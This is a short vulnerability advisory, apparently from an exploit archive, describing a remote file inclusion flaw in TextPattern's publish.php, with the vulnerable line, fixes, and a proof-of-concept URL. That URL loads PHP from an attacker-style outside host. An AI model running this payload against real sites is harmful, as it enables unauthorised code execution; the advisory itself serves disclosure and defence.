TextPattern <= 1.19 (publish.php) Remote File Inclusion Vulnerability

----------------------------------------------------------------------------<br /> TextPattern <=g1.19 (txpcfg[txpath]) Remote File Inclusion Vulnerability<br /> ----------------------------------------------------------------------------<br /> <br /> Author : Zeni Susanto A.K.A Bithedz<br /> Date Found : October, 25th 2006<br /> Location : Indonesia,Bandung<br /> Critical Lvl : Highly critical<br /> Impact : System access<br /> Where : From Remote<br /> ---------------------------------------------------------------------------<br /> <br /> Affected software description:<br /> ~~~~~~~~~~~~~~~~~~~~~~~~~<br /> <br /> Application : TextPattern<br /> version : <=g1.19<br /> URL : http://textpattern.com/deanload/textpattern_g119.zip<br /> <br /> textpattern is A free, flexible, elegant, easy-to-use content management system for all kinds of websites, even weblogs.<br /> <br /> <br /> ---------------------------------------------------------------------------<br /> <br /> Vulnerability:<br /> ~~~~~~~~~~~<br /> <br /> In file publish.php I found vulnerability script<br /> --------------------------publish.php---------------------------------------<br /> define("txpath",$txpcfg['txpath']); <br /> ----------------------------------------------------------------------------<br /> <br /> Input passed to the "txpcfg['txpath']" parameter in publish.php is not<br /> properly verified before being used. This can be exploited to execute<br /> arbitrary PHP code by including files from local or external<br /> resources.<br /> <br /> <br /> Proof Of Concept:<br /> ~~~~~~~~~~~~<br /> http://yourtargetsite/[textpattern_g119_path]/textpattern/publish.php?txpcfg[txpath]=http://attact/colok.txt?<br /> Solution:<br /> ~~~~<br /> - Sanitize variable $txpcfg['txpath'] on affected files.<br /> - Turn off register_globals<br /> <br /> ---------------------------------------------------------------------------<br /> <br /> Shoutz:<br /> ~<br /> ~ K-159<br /> ~ Monik My Brain<br /> ~ #bridge (silent) @irc.dal.net<br /> ------------------------------------------------------------------------<br /> ---<br /> Contact:<br /> ~<br /> bithedz[at]gmail[dot]com<br />